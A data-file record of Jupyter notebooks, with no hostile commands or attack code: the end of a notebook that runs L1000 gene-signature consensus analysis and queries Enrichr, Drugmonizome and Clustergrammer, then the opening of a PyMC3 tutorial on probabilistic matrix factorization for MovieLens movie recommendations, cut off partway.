\"z-sum\": scores.get(\"z-sum (abs)\", 0)\n }\n elif scores[\"type\"] == \"reverser\" and len(signatures[\"reversers\"]) < 100:\n pert_name = sig[\"meta\"].get(\"pert_name\", None)\n local_id = \"%s_%s\"%(pert_name, local_id.replace(\"_%s\"%pert_name, \"\"))\n signatures[\"reversers\"][local_id] = {\n \"pert_name\": sig[\"meta\"].get(\"pert_name\", None),\n \"pert_time\": sig[\"meta\"].get(\"pert_time\", None),\n \"pert_dose\": sig[\"meta\"].get(\"pert_dose\", None),\n \"cell_line\": sig[\"meta\"].get(\"cell_line\", None),\n \"z-sum\": scores.get(\"z-sum (abs)\", 0)\n }\n return signatures\n\n except Exception as e:\n print(e)",
"_____no_output_____"
],
[
"# enriched = {lib:{\"mimickers\": {}, \"reversers\": {}} for lib in datasets}\nenriched = {\"mimickers\": {lib: {} for lib in datasets}, \"reversers\": {lib: {} for lib in datasets}}\nmetadata = {}\nfor k,sig in tqdm(signatures.items()): \n try:\n time.sleep(0.1)\n genes = convert_genes(sig[\"up_genes\"],sig[\"down_genes\"])\n if (\"entities\" in genes and len(genes[\"entities\"]) > 5) or (len(genes[\"up_entities\"]) > 5 and len(genes[\"down_entities\"]) > 5):\n for lib in datasets:\n library = dataset_map[lib]\n s = signature_search(genes, library)\n if gene_set_direction == None:\n sigs = resolve_ranktwosided(s)\n else:\n sigs = resolve_rank(s, gene_set_direction)\n enriched[\"mimickers\"][lib][k] = sigs[\"mimickers\"]\n enriched[\"reversers\"][lib][k] = sigs[\"reversers\"]\n for direction, entries in sigs.items():\n for label, meta in entries.items():\n if label not in metadata:\n metadata[label] = {\n \"pert_name\": meta.get(\"pert_name\", None),\n \"pert_time\": meta.get(\"pert_time\", None),\n \"pert_dose\": meta.get(\"pert_dose\", None),\n \"cell_line\": meta.get(\"cell_line\", None),\n }\n time.sleep(0.1)\n except Exception as e:\n print(e)",
"_____no_output_____"
],
[
"def clustergrammer(df, name, figure, label=\"Clustergrammer\"):\n clustergram_df = df.rename(columns={i:\"Signature: %s\"%i for i in df.columns}, index={i:\"Drug: %s\"%i for i in df.index})\n clustergram_df.to_csv(name, sep=\"\\t\")\n response = ''\n timeout = 0.5\n for i in range(5):\n try:\n res = requests.post(CLUSTERGRAMMER_URL, files={'file': open(name, 'rb')})\n if not res.ok:\n response = res.text\n time.sleep(timeout)\n if res.status_code >= 500:\n timeout = timeout * 2\n else:\n clustergrammer_url = res.text.replace(\"http:\",\"https:\") \n break\n except Exception as e:\n response = e\n time.sleep(2)\n else:\n if type(response) == Exception:\n raise response\n else:\n raise Exception(response)\n display(IFrame(clustergrammer_url, width=\"1000\", height=\"1000\"))\n display(Markdown(\"**Figure %d** %s [Go to url](%s)\"%(figure, label, clustergrammer_url)))\n figure += 1\n return figure\n\ncmap = sns.cubehelix_palette(50, hue=0.05, rot=0, light=1, dark=0)\n\ndef heatmap(df, filename, figure, label, width=15, height=15):\n fig = plt.figure(figsize=(width,height))\n cg = sns.clustermap(df, cmap=cmap, figsize=(width, height))\n cg.ax_row_dendrogram.set_visible(False)\n cg.ax_col_dendrogram.set_visible(False)\n display(cg)\n plt.show()\n cg.savefig(filename)\n display(Markdown(\"**Figure %d** %s\"%(figure, label)))\n figure+=1\n return figure\n\ndef make_clickable(link):\n # target _blank to open new window\n # extract clickable text to display for your link\n text = link.split('=')[1]\n return f'<a target=\"_blank\" href=\"{link}\">{text}</a>'\n\n\nannot_dict = {}\ndef bar_chart(enrichment, title=''):\n bar_color = 'mediumspringgreen'\n bar_color_not_sig = 'lightgrey'\n edgecolor=None\n linewidth=0\n if len(enrichment) > 10:\n enrichment = enrichment[0:10]\n enrichment_names = [i[\"name\"] for i in enrichment]\n enrichment_scores = [i[\"pval\"] for i in enrichment]\n plt.figure(figsize=(10,4))\n bar_colors = [bar_color if (x < 0.05) else bar_color_not_sig for x in enrichment_scores]\n fig = sns.barplot(x=np.log10(enrichment_scores)*-1, y=enrichment_names, palette=bar_colors, edgecolor=edgecolor, linewidth=linewidth)\n fig.axes.get_yaxis().set_visible(False)\n fig.set_title(title.replace('_',' '),fontsize=20)\n fig.set_xlabel('-Log10(p-value)',fontsize=19)\n fig.xaxis.set_major_locator(MaxNLocator(integer=True))\n fig.tick_params(axis='x', which='major', labelsize=20)\n if max(np.log10(enrichment_scores)*-1)<1:\n fig.xaxis.set_ticks(np.arange(0, max(np.log10(enrichment_scores)*-1), 0.1))\n for ii,annot in enumerate(enrichment_names):\n if annot in annot_dict.keys():\n annot = annot_dict[annot]\n if enrichment_scores[ii] < 0.05:\n annot = ' *'.join([annot, str(str(np.format_float_scientific(enrichment_scores[ii],precision=2)))]) \n else:\n annot = ' '.join([annot, str(str(np.format_float_scientific(enrichment_scores[ii],precision=2)))])\n\n title_start= max(fig.axes.get_xlim())/200\n fig.text(title_start,ii,annot,ha='left',wrap = True, fontsize = 12)\n fig.patch.set_edgecolor('black') \n fig.patch.set_linewidth('2')\n plt.show()\n \n\ndef get_drugmonizome_plot(consensus, label, figure, dataset):\n payload = {\n \"filter\":{\n \"where\": {\n \"meta.Name\": {\n \"inq\": [i.lower() for i in set(consensus['pert name'])]\n }\n }\n }\n }\n\n res = requests.post(drugmonizome_meta_api + \"/entities/find\", json=payload)\n\n entities = {}\n for i in res.json():\n name = i[\"meta\"][\"Name\"]\n uid = i[\"id\"]\n if name not in entities:\n entities[name] = uid\n \n query = {\n \"entities\": list(entities.values()),\n \"limit\": 1000,\n \"database\": dataset\n }\n\n res = requests.post(drugmonizome_data_api + \"/enrich/overlap\", json=query)\n\n scores = res.json()[\"results\"]\n uids = {i[\"uuid\"]: i for i in scores}\n\n payload = {\n \"filter\":{\n \"where\": {\n \"id\": {\n \"inq\": list(uids.keys())\n }\n }\n }\n }\n\n res = requests.post(drugmonizome_meta_api + \"/signatures/find\", json=payload)\n\n sigs = res.json()\n sigs = res.json()\n scores = []\n for i in sigs:\n score = uids[i[\"id\"]]\n scores.append({\n \"name\": i[\"meta\"][\"Term\"][0][\"Name\"],\n \"pval\": score[\"p-value\"]\n })\n \n scores.sort(key=lambda x: x['pval'])\n if len(scores) > 0:\n bar_chart(scores, dataset.replace(\"setlibrary\", \" set library\"))\n display(Markdown(\"**Figure %d** %s\"%(figure, label)))\n figure += 1\n return figure\n\ndef get_enrichr_bar(userListId, enrichr_library, figure, label):\n query_string = '?userListId=%s&backgroundType=%s'\n res = requests.get(\n enrichr_api + 'enrich' + query_string % (userListId, enrichr_library)\n )\n if not res.ok:\n raise Exception('Error fetching enrichment results')\n\n data = res.json()[enrichr_library]\n scores = [{\"name\": i[1], \"pval\": i[2]} for i in data]\n scores.sort(key=lambda x: x['pval'])\n if len(scores) > 0:\n bar_chart(scores, enrichr_library)\n display(Markdown(\"**Figure %d** %s\"%(figure, label)))\n figure +=1\n return figure\n\ndef enrichment(consensus, label, figure):\n gene_names = [i.upper() for i in set(consensus['pert name'])]\n genes_str = '\\n'.join(gene_names)\n description = label\n payload = {\n 'list': (None, genes_str),\n 'description': (None, description)\n }\n\n res = requests.post(enrichr_api + 'addList', files=payload)\n if not res.ok:\n raise Exception('Error analyzing gene list')\n\n data = res.json()\n shortId = data[\"shortId\"]\n userListId = data[\"userListId\"]\n display(Markdown(\"Enrichr Link: https://maayanlab.cloud/Enrichr/enrich?dataset=%s\"%shortId))\n for d in enrichr_libraries:\n l = \"Enrichr %s top ranked terms for %s\"%(d.replace(\"_\", \" \"), label)\n figure = get_enrichr_bar(userListId, d, figure, l)\n return figure",
"_____no_output_____"
]
],
[
[
"## Consensus Analysis\nMimicking and reversing perturbagen scores are organized into a matrix. Depending on the consensus method chosen by the user, the consensus signatures are computed either by ranking the sum of z-scores or z-sum; or by counts.\n\n\n### Mimickers",
"_____no_output_____"
]
],
[
[
"score_field = \"z-sum\" if gene_set_direction == None else \"z-score\"\ntop_n_signatures = 100",
"_____no_output_____"
],
[
"direction = \"mimickers\"\nalternate = \"mimicking\"\nfor lib in datasets:\n library = dataset_map[lib]\n display(Markdown(\"#### Consensus %s %s signatures\"%(alternate, labeller[lib])), display_id=alternate+lib)\n index = set()\n sig_dict = enriched[direction][lib]\n for v in sig_dict.values():\n index = index.union(v.keys())\n df = pd.DataFrame(0, index=index, columns=sig_dict.keys())\n for sig_name,v in sig_dict.items():\n for local_id, meta in v.items():\n df.at[local_id, sig_name] = meta[score_field]\n filename = \"sig_matrix_%s_%s.tsv\"%(library.replace(\" \",\"_\"), direction)\n df.to_csv(filename, sep=\"\\t\")\n display(Markdown(\"Download score matrix for %s %s signatures ([download](./%s))\"%\n (alternate, labeller[lib], filename)))\n if len(df.index) > 1 and len(df.columns) > 1:\n top_index = df.index\n if len(top_index) > top_n_signatures:\n top_index = df[(df>0).sum(1) >= min_sigs].sum(1).sort_values(ascending=False).index\n top_index = top_index if len(top_index) <= top_n_signatures else top_index[0:top_n_signatures]\n if (df.loc[top_index].sum()>0).sum() < len(df.columns):\n blank = df.loc[top_index].sum()==0\n blank_indices = [i for i in blank.index if blank[i]]\n top_index = list(top_index) + [df[i].idxmax() for i in blank_indices]\n top_df = df.loc[top_index]\n consensus_norm = quantile_normalize(top_df)\n display(Markdown(\"##### Clustergrammer for %s %s perturbagens\"%(alternate, labeller[lib])), display_id=\"%s-clustergrammer-%s\"%(alternate, lib))\n label = \"Clustergrammer of consensus %s perturbagens of L1000 %s perturbations(2021) (quantile normalized scores)\"%(alternate, labeller[lib])\n name = \"clustergrammer_%s_%s.tsv\"%(library.replace(\" \", \"_\"), direction)\n figure = clustergrammer(consensus_norm, name, figure, label)\n\n display(Markdown(\"#### Heatmap for %s %s perturbagens\"%(alternate, labeller[lib])), display_id=\"%s-heatmap-%s\"%(alternate, lib))\n label = \"Heatmap of consensus %s perturbagens of L1000 %s perturbations(2021) (quantile normalized scores)\"%(alternate, labeller[lib])\n name = \"heatmap_%s_%s.png\"%(library.replace(\" \", \"_\"), direction)\n figure = heatmap(consensus_norm, name, figure, label)\n\n df = df[(df>0).sum(1) >= min_sigs]\n if consensus_method == 'z-score':\n df = df.loc[df.sum(1).sort_values(ascending=False).index[0:top_perts]]\n else:\n df = df.loc[(df > 0).sum(1).sort_values(ascending=False).index[0:top_perts]]\n \n if lib in gene_page:\n# \"pert_name\": sig[\"meta\"].get(\"pert_name\", None),\n# \"pert_time\": sig[\"meta\"].get(\"pert_time\", None),\n# \"pert_dose\": sig[\"meta\"].get(\"pert_dose\", None),\n# \"cell_line\": sig[\"meta\"].get(\"cell_line\", None),\n stat_df = pd.DataFrame(index=df.index, columns=[\"pert name\", \"pert time\", \"cell line\", \"count\", \"z-sum\", \"Enrichr gene page\"])\n stat_df['count'] = (df > 0).sum(1)\n # Compute zstat and p value\n stat_df[\"z-sum\"] = df.sum(1)\n for i in stat_df.index:\n stat_df.at[i, \"pert name\"] = metadata[i][\"pert_name\"]\n stat_df.at[i, \"pert time\"] = metadata[i][\"pert_time\"]\n stat_df.at[i, \"cell line\"] = metadata[i][\"cell_line\"]\n stat_df['Enrichr gene page'] = [\"https://maayanlab.cloud/Enrichr/#find!gene=%s\"%i for i in stat_df[\"pert name\"]]\n stat_df = stat_df.fillna(\"-\")\n filename = \"sig_stat_%s_%s.tsv\"%(lib.replace(\" \",\"_\"), direction)\n stat_df.to_csv(filename, sep=\"\\t\")\n stat_df['Enrichr gene page'] = stat_df['Enrichr gene page'].apply(make_clickable)\n stat_html = stat_df.head(25).to_html(escape=False)\n display(HTML(stat_html))\n else:\n stat_df = pd.DataFrame(index=df.index, columns=[\"pert name\", \"pert dose\", \"pert time\", \"cell line\", \"count\", \"z-sum\"])\n stat_df['count'] = (df > 0).sum(1)\n stat_df[\"z-sum\"] = df.sum(1)\n \n for i in stat_df.index:\n stat_df.at[i, \"pert name\"] = metadata[i][\"pert_name\"]\n stat_df.at[i, \"pert dose\"] = metadata[i][\"pert_dose\"]\n stat_df.at[i, \"pert time\"] = metadata[i][\"pert_time\"]\n stat_df.at[i, \"cell line\"] = metadata[i][\"cell_line\"]\n stat_df = stat_df.fillna(\"-\")\n filename = \"sig_stat_%s_%s.tsv\"%(library.replace(\" \",\"_\"), direction)\n stat_df.to_csv(filename, sep=\"\\t\")\n display(stat_df.head(25))\n display(Markdown(\"**Table %d** Top 25 consensus %s %s signatures([download](./%s))\"%\n (table, alternate, labeller[lib], filename)))\n\n table+=1\n\n \n# display(df.head())\n# display(Markdown(\"**Table %d** Consensus %s %s signatures ([download](./%s))\"%\n# (table, alternate, labeller[lib], filename)))\n\n# table+=1\n if len(set(stat_df[\"pert name\"])) > 5:\n if lib in drug_page:\n display(Markdown(\"#### Drugmonizome enrichment analysis for the consensus %s %s perturbagens\"% (alternate, labeller[lib])))\n for d in drugmonizome_datasets:\n label = \"%s top ranked enriched terms for %s %s perturbagens\"%(d.replace(\"_\", \" \"), alternate, labeller[lib])\n figure = get_drugmonizome_plot(stat_df, label, figure, d)\n elif lib in gene_page:\n display(Markdown(\"#### Enrichr link to analyze enriched terms for the consensus %s %s perturbagens\"% (alternate, labeller[lib])))\n label = \"%s L1000 %s perturbagens\"%(alternate, labeller[lib])\n figure = enrichment(stat_df, label, figure)",
"_____no_output_____"
]
],
[
[
"### Reversers",
"_____no_output_____"
]
],
[
[
"direction = \"reversers\"\nalternate = \"reversing\"\nfor lib in datasets:\n library = dataset_map[lib]\n display(Markdown(\"#### Consensus %s %s signatures\"%(alternate, labeller[lib])), display_id=alternate+lib)\n index = set()\n sig_dict = enriched[direction][lib]\n for v in sig_dict.values():\n index = index.union(v.keys())\n df = pd.DataFrame(0, index=index, columns=sig_dict.keys())\n for sig_name,v in sig_dict.items():\n for local_id, meta in v.items():\n df.at[local_id, sig_name] = meta[score_field]\n filename = \"sig_matrix_%s_%s.tsv\"%(library.replace(\" \",\"_\"), direction)\n df.to_csv(filename, sep=\"\\t\")\n display(Markdown(\"Download score matrix for %s %s signatures ([download](./%s))\"%\n (alternate, labeller[lib], filename)))\n if len(df.index) > 1 and len(df.columns) > 1:\n top_index = df.index\n if len(top_index) > top_n_signatures:\n top_index = df[(df>0).sum(1) >= min_sigs].sum(1).sort_values(ascending=False).index\n top_index = top_index if len(top_index) <= top_n_signatures else top_index[0:top_n_signatures]\n if (df.loc[top_index].sum()>0).sum() < len(df.columns):\n blank = df.loc[top_index].sum()==0\n blank_indices = [i for i in blank.index if blank[i]]\n top_index = list(top_index) + [df[i].idxmax() for i in blank_indices]\n top_df = df.loc[top_index]\n consensus_norm = quantile_normalize(top_df)\n display(Markdown(\"##### Clustergrammer for %s %s perturbagens\"%(alternate, labeller[lib])), display_id=\"%s-clustergrammer-%s\"%(alternate, lib))\n label = \"Clustergrammer of consensus %s perturbagens of L1000 %s perturbations(2021) (quantile normalized scores)\"%(alternate, labeller[lib])\n name = \"clustergrammer_%s_%s.tsv\"%(library.replace(\" \", \"_\"), direction)\n figure = clustergrammer(consensus_norm, name, figure, label)\n\n display(Markdown(\"#### Heatmap for %s %s perturbagens\"%(alternate, labeller[lib])), display_id=\"%s-heatmap-%s\"%(alternate, lib))\n label = \"Heatmap of consensus %s perturbagens of L1000 %s perturbations(2021) (quantile normalized scores)\"%(alternate, labeller[lib])\n name = \"heatmap_%s_%s.png\"%(library.replace(\" \", \"_\"), direction)\n figure = heatmap(consensus_norm, name, figure, label)\n\n df = df[(df>0).sum(1) >= min_sigs]\n if consensus_method == 'z-score':\n df = df.loc[df.sum(1).sort_values(ascending=False).index[0:top_perts]]\n else:\n df = df.loc[(df > 0).sum(1).sort_values(ascending=False).index[0:top_perts]]\n \n if lib in gene_page:\n# \"pert_name\": sig[\"meta\"].get(\"pert_name\", None),\n# \"pert_time\": sig[\"meta\"].get(\"pert_time\", None),\n# \"pert_dose\": sig[\"meta\"].get(\"pert_dose\", None),\n# \"cell_line\": sig[\"meta\"].get(\"cell_line\", None),\n stat_df = pd.DataFrame(index=df.index, columns=[\"pert name\", \"pert time\", \"cell line\", \"count\", \"z-sum\", \"Enrichr gene page\"])\n stat_df['count'] = (df > 0).sum(1)\n # Compute zstat and p value\n stat_df[\"z-sum\"] = df.sum(1)\n for i in stat_df.index:\n stat_df.at[i, \"pert name\"] = metadata[i][\"pert_name\"]\n stat_df.at[i, \"pert time\"] = metadata[i][\"pert_time\"]\n stat_df.at[i, \"cell line\"] = metadata[i][\"cell_line\"]\n stat_df['Enrichr gene page'] = [\"https://maayanlab.cloud/Enrichr/#find!gene=%s\"%i for i in stat_df[\"pert name\"]]\n stat_df = stat_df.fillna(\"-\")\n filename = \"sig_stat_%s_%s.tsv\"%(lib.replace(\" \",\"_\"), direction)\n stat_df.to_csv(filename, sep=\"\\t\")\n stat_df['Enrichr gene page'] = stat_df['Enrichr gene page'].apply(make_clickable)\n stat_html = stat_df.head(25).to_html(escape=False)\n display(HTML(stat_html))\n else:\n stat_df = pd.DataFrame(index=df.index, columns=[\"pert name\", \"pert dose\", \"pert time\", \"cell line\", \"count\", \"z-sum\"])\n stat_df['count'] = (df > 0).sum(1)\n stat_df[\"z-sum\"] = df.sum(1)\n \n for i in stat_df.index:\n stat_df.at[i, \"pert name\"] = metadata[i][\"pert_name\"]\n stat_df.at[i, \"pert dose\"] = metadata[i][\"pert_dose\"]\n stat_df.at[i, \"pert time\"] = metadata[i][\"pert_time\"]\n stat_df.at[i, \"cell line\"] = metadata[i][\"cell_line\"]\n stat_df = stat_df.fillna(\"-\")\n filename = \"sig_stat_%s_%s.tsv\"%(library.replace(\" \",\"_\"), direction)\n stat_df.to_csv(filename, sep=\"\\t\")\n display(stat_df.head(25))\n display(Markdown(\"**Table %d** Top 25 consensus %s %s signatures([download](./%s))\"%\n (table, alternate, labeller[lib], filename)))\n\n table+=1\n\n \n# display(df.head())\n# display(Markdown(\"**Table %d** Consensus %s %s signatures ([download](./%s))\"%\n# (table, alternate, labeller[lib], filename)))\n\n# table+=1\n if len(set(stat_df[\"pert name\"])) > 5:\n if lib in drug_page:\n display(Markdown(\"#### Drugmonizome enrichment analysis for the consensus %s %s perturbagens\"% (alternate, labeller[lib])))\n for d in drugmonizome_datasets:\n label = \"%s top ranked enriched terms for %s %s perturbagens\"%(d.replace(\"_\", \" \"), alternate, labeller[lib])\n figure = get_drugmonizome_plot(stat_df, label, figure, d)\n elif lib in gene_page:\n display(Markdown(\"#### Enrichr link to analyze enriched terms for the consensus %s %s perturbagens\"% (alternate, labeller[lib])))\n label = \"%s L1000 %s perturbagens\"%(alternate, labeller[lib])\n figure = enrichment(stat_df, label, figure)",
"_____no_output_____"
]
],
[
[
"## References\n[1] Subramanian, A., Narayan, R., Corsello, S. M., Peck, D. D., Natoli, T. E., Lu, X., ... & Golub, T. R. (2017). A next generation connectivity map: L1000 platform and the first 1,000,000 profiles. Cell, 171(6), 1437-1452.\n\n[2] Fernandez, N. F., Gundersen, G. W., Rahman, A., Grimes, M. L., Rikova, K., Hornbeck, P., & Ma’ayan, A. (2017). Clustergrammer, a web-based heatmap visualization and analysis tool for high-dimensional biological data. Scientific data, 4(1), 1-12.\n\n[3] Chen, E. Y., Tan, C. M., Kou, Y., Duan, Q., Wang, Z., Meirelles, G. V., ... & Ma’ayan, A. (2013). Enrichr: interactive and collaborative HTML5 gene list enrichment analysis tool. BMC bioinformatics, 14(1), 1-14.\n\n[4] Kuleshov, Maxim V., et al. \"Enrichr: a comprehensive gene set enrichment analysis web server 2016 update.\" Nucleic acids research 44.W1 (2016): W90-W97.\n\n[5] Xie, Z., Bailey, A., Kuleshov, M. V., Clarke, D. J., Evangelista, J. E., Jenkins, S. L., ... & Ma'ayan, A. (2021). Gene set knowledge discovery with Enrichr. Current protocols, 1(3), e90.\n\n[6] Kropiwnicki, E., Evangelista, J. E., Stein, D. J., Clarke, D. J., Lachmann, A., Kuleshov, M. V., ... & Ma’ayan, A. (2021). Drugmonizome and Drugmonizome-ML: integration and abstraction of small molecule attributes for drug enrichment analysis and machine learning. Database, 2021.\n\n[7] Maglott, D., Ostell, J., Pruitt, K. D., & Tatusova, T. (2005). Entrez Gene: gene-centered information at NCBI. Nucleic acids research, 33(suppl_1), D54-D58.\n\n[8] Brown, G. R., Hem, V., Katz, K. S., Ovetsky, M., Wallin, C., Ermolaeva, O., ... & Murphy, T. D. (2015). Gene: a gene-centered information resource at NCBI. Nucleic acids research, 43(D1), D36-D42.",
"_____no_output_____"
]
]
] | [
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown"
] | [
[
"code",
"code",
"code"
],
[
"markdown"
],
[
"code",
"code",
"code",
"code",
"code",
"code",
"code"
],
[
"markdown"
],
[
"code",
"code"
],
[
"markdown"
],
[
"code",
"code"
],
[
"markdown"
],
[
"code",
"code",
"code"
],
[
"markdown"
],
[
"code",
"code"
],
[
"markdown"
],
[
"code"
],
[
"markdown"
]
] |
cb2b8254263f43b24fc0c51940254fadb2126b7b | 569,323 | ipynb | Jupyter Notebook | examples/case_studies/probabilistic_matrix_factorization.ipynb | ltoniazzi/pymc-examples | 6b66c620afbbfc37ea4b90aa907e07918b51b0c1 | [
"MIT"
] | 1 | 2022-01-30T15:59:32.000Z | 2022-01-30T15:59:32.000Z | examples/case_studies/probabilistic_matrix_factorization.ipynb | chiral-carbon/pymc-examples | 6a23dba3ba74199cc10b7fc647761e82328edcf2 | [
"MIT"
] | null | null | null | examples/case_studies/probabilistic_matrix_factorization.ipynb | chiral-carbon/pymc-examples | 6a23dba3ba74199cc10b7fc647761e82328edcf2 | [
"MIT"
] | 1 | 2021-05-12T02:22:41.000Z | 2021-05-12T02:22:41.000Z | 304.940011 | 123,856 | 0.9036 | [
[
[
"# Probabilistic Matrix Factorization for Making Personalized Recommendations",
"_____no_output_____"
]
],
[
[
"%matplotlib inline\nimport numpy as np\nimport pandas as pd\nimport pymc3 as pm\n\nfrom matplotlib import pyplot as plt\n\nplt.style.use(\"seaborn-darkgrid\")\nprint(f\"Running on PyMC3 v{pm.__version__}\")",
"Running on PyMC3 v3.11.0\n"
]
],
[
[
"## Motivation\n\nSo you are browsing for something to watch on Netflix and just not liking the suggestions. You just know you can do better. All you need to do is collect some ratings data from yourself and friends and build a recommendation algorithm. This notebook will guide you in doing just that!\n\nWe'll start out by getting some intuition for how our model will work. Then we'll formalize our intuition. Afterwards, we'll examine the dataset we are going to use. Once we have some notion of what our data looks like, we'll define some baseline methods for predicting preferences for movies. Following that, we'll look at Probabilistic Matrix Factorization (PMF), which is a more sophisticated Bayesian method for predicting preferences. Having detailed the PMF model, we'll use PyMC3 for MAP estimation and MCMC inference. Finally, we'll compare the results obtained with PMF to those obtained from our baseline methods and discuss the outcome.\n\n## Intuition\n\nNormally if we want recommendations for something, we try to find people who are similar to us and ask their opinions. If Bob, Alice, and Monty are all similar to me, and they all like crime dramas, I'll probably like crime dramas. Now this isn't always true. It depends on what we consider to be \"similar\". In order to get the best bang for our buck, we really want to look for people who have the most similar taste. Taste being a complex beast, we'd probably like to break it down into something more understandable. We might try to characterize each movie in terms of various factors. Perhaps films can be moody, light-hearted, cinematic, dialogue-heavy, big-budget, etc. Now imagine we go through IMDB and assign each movie a rating in each of the categories. How moody is it? How much dialogue does it have? What's its budget? Perhaps we use numbers between 0 and 1 for each category. Intuitively, we might call this the film's profile.\n\nNow let's suppose we go back to those 5 movies we rated. At this point, we can get a richer picture of our own preferences by looking at the film profiles of each of the movies we liked and didn't like. Perhaps we take the averages across the 5 film profiles and call this our ideal type of film. In other words, we have computed some notion of our inherent _preferences_ for various types of movies. Suppose Bob, Alice, and Monty all do the same. Now we can compare our preferences and determine how similar each of us really are. I might find that Bob is the most similar and the other two are still more similar than other people, but not as much as Bob. So I want recommendations from all three people, but when I make my final decision, I'm going to put more weight on Bob's recommendation than those I get from Alice and Monty.\n\nWhile the above procedure sounds fairly effective as is, it also reveals an unexpected additional source of information. If we rated a particular movie highly, and we know its film profile, we can compare with the profiles of other movies. If we find one with very close numbers, it is probable we'll also enjoy this movie. Both this approach and the one above are commonly known as _neighborhood approaches_. Techniques that leverage both of these approaches simultaneously are often called _collaborative filtering_ [[1]](http://www2.research.att.com/~volinsky/papers/ieeecomputer.pdf). The first approach we talked about uses user-user similarity, while the second uses item-item similarity. Ideally, we'd like to use both sources of information. The idea is we have a lot of items available to us, and we'd like to work together with others to filter the list of items down to those we'll each like best. My list should have the items I'll like best at the top and those I'll like least at the bottom. Everyone else wants the same. If I get together with a bunch of other people, we all watch 5 movies, and we have some efficient computational process to determine similarity, we can very quickly order the movies to our liking.\n\n## Formalization\n\nLet's take some time to make the intuitive notions we've been discussing more concrete. We have a set of $M$ movies, or _items_ ($M = 100$ in our example above). We also have $N$ people, whom we'll call _users_ of our recommender system. For each item, we'd like to find a $D$ dimensional factor composition (film profile above) to describe the item. Ideally, we'd like to do this without actually going through and manually labeling all of the movies. Manual labeling would be both slow and error-prone, as different people will likely label movies differently. So we model each movie as a $D$ dimensional vector, which is its latent factor composition. Furthermore, we expect each user to have some preferences, but without our manual labeling and averaging procedure, we have to rely on the latent factor compositions to learn $D$ dimensional latent preference vectors for each user. The only thing we get to observe is the $N \\times M$ ratings matrix $R$ provided by the users. Entry $R_{ij}$ is the rating user $i$ gave to item $j$. Many of these entries may be missing, since most users will not have rated all 100 movies. Our goal is to fill in the missing values with predicted ratings based on the latent variables $U$ and $V$. We denote the predicted ratings by $R_{ij}^*$. We also define an indicator matrix $I$, with entry $I_{ij} = 0$ if $R_{ij}$ is missing and $I_{ij} = 1$ otherwise.\n\nSo we have an $N \\times D$ matrix of user preferences which we'll call $U$ and an $M \\times D$ factor composition matrix we'll call $V$. We also have a $N \\times M$ rating matrix we'll call $R$. We can think of each row $U_i$ as indications of how much each user prefers each of the $D$ latent factors. Each row $V_j$ can be thought of as how much each item can be described by each of the latent factors. In order to make a recommendation, we need a suitable prediction function which maps a user preference vector $U_i$ and an item latent factor vector $V_j$ to a predicted ranking. The choice of this prediction function is an important modeling decision, and a variety of prediction functions have been used. Perhaps the most common is the dot product of the two vectors, $U_i \\cdot V_j$ [[1]](http://www2.research.att.com/~volinsky/papers/ieeecomputer.pdf).\n\nTo better understand CF techniques, let us explore a particular example. Imagine we are seeking to recommend movies using a model which infers five latent factors, $V_j$, for $j = 1,2,3,4,5$. In reality, the latent factors are often unexplainable in a straightforward manner, and most models make no attempt to understand what information is being captured by each factor. However, for the purposes of explanation, let us assume the five latent factors might end up capturing the film profile we were discussing above. So our five latent factors are: moody, light-hearted, cinematic, dialogue, and budget. Then for a particular user $i$, imagine we infer a preference vector $U_i = <0.5, 0.1, 1.5, 1.1, 0.3>$. Also, for a particular item $j$, we infer these values for the latent factors: $V_j = <0.5, 1.5, 1.25, 0.8, 0.9>$. Using the dot product as the prediction function, we would calculate 3.425 as the ranking for that item, which is more or less a neutral preference given our 1 to 5 rating scale.\n\n$$ 0.5 \\times 0.5 + 0.1 \\times 1.5 + 1.5 \\times 1.25 + 1.1 \\times 0.8 + 0.3 \\times 0.9 = 3.425 $$",
"_____no_output_____"
],
[
"## Data\n\nThe [MovieLens 100k dataset](https://grouplens.org/datasets/movielens/100k/) was collected by the GroupLens Research Project at the University of Minnesota. This data set consists of 100,000 ratings (1-5) from 943 users on 1682 movies. Each user rated at least 20 movies, and be have basic information on the users (age, gender, occupation, zip). Each movie includes basic information like title, release date, video release date, and genre. We will implement a model that is suitable for collaborative filtering on this data and evaluate it in terms of root mean squared error (RMSE) to validate the results.\n\nThe data was collected through the MovieLens web site\n(movielens.umn.edu) during the seven-month period from September 19th,\n1997 through April 22nd, 1998. This data has been cleaned up - users\nwho had less than 20 ratings or did not have complete demographic\ninformation were removed from this data set.\n\n\nLet's begin by exploring our data. We want to get a general feel for what it looks like and a sense for what sort of patterns it might contain. Here are the user rating data:",
"_____no_output_____"
]
],
[
[
"data = pd.read_csv(\n pm.get_data(\"ml_100k_u.data\"), sep=\"\\t\", names=[\"userid\", \"itemid\", \"rating\", \"timestamp\"]\n)\ndata.head()",
"_____no_output_____"
]
],
[
[
"And here is the movie detail data:",
"_____no_output_____"
]
],
[
[
"# fmt: off\nmovie_columns = ['movie id', 'movie title', 'release date', 'video release date', 'IMDb URL', \n 'unknown','Action','Adventure', 'Animation',\"Children's\", 'Comedy', 'Crime',\n 'Documentary', 'Drama', 'Fantasy', 'Film-Noir', 'Horror', 'Musical', 'Mystery',\n 'Romance', 'Sci-Fi', 'Thriller', 'War', 'Western']\n# fmt: on\nmovies = pd.read_csv(\n pm.get_data(\"ml_100k_u.item\"),\n sep=\"|\",\n names=movie_columns,\n index_col=\"movie id\",\n parse_dates=[\"release date\"],\n)\nmovies.head()",
"_____no_output_____"
],
[
"# Extract the ratings from the DataFrame\nratings = data.rating\n\n# Plot histogram\ndata.groupby(\"rating\").size().plot(kind=\"bar\");",
"_____no_output_____"
],
[
"data.rating.describe()",
"_____no_output_____"
]
],
[
[
"This must be a decent batch of movies. From our exploration above, we know most ratings are in the range 3 to 5, and positive ratings are more likely than negative ratings. Let's look at the means for each movie to see if we have any particularly good (or bad) movie here.\n",
"_____no_output_____"
]
],
[
[
"movie_means = data.join(movies[\"movie title\"], on=\"itemid\").groupby(\"movie title\").rating.mean()\nmovie_means[:50].plot(kind=\"bar\", grid=False, figsize=(16, 6), title=\"Mean ratings for 50 movies\");",
"_____no_output_____"
]
],
[
[
"While the majority of the movies generally get positive feedback from users, there are definitely a few that stand out as bad. Let's take a look at the worst and best movies, just for fun:",
"_____no_output_____"
]
],
[
[
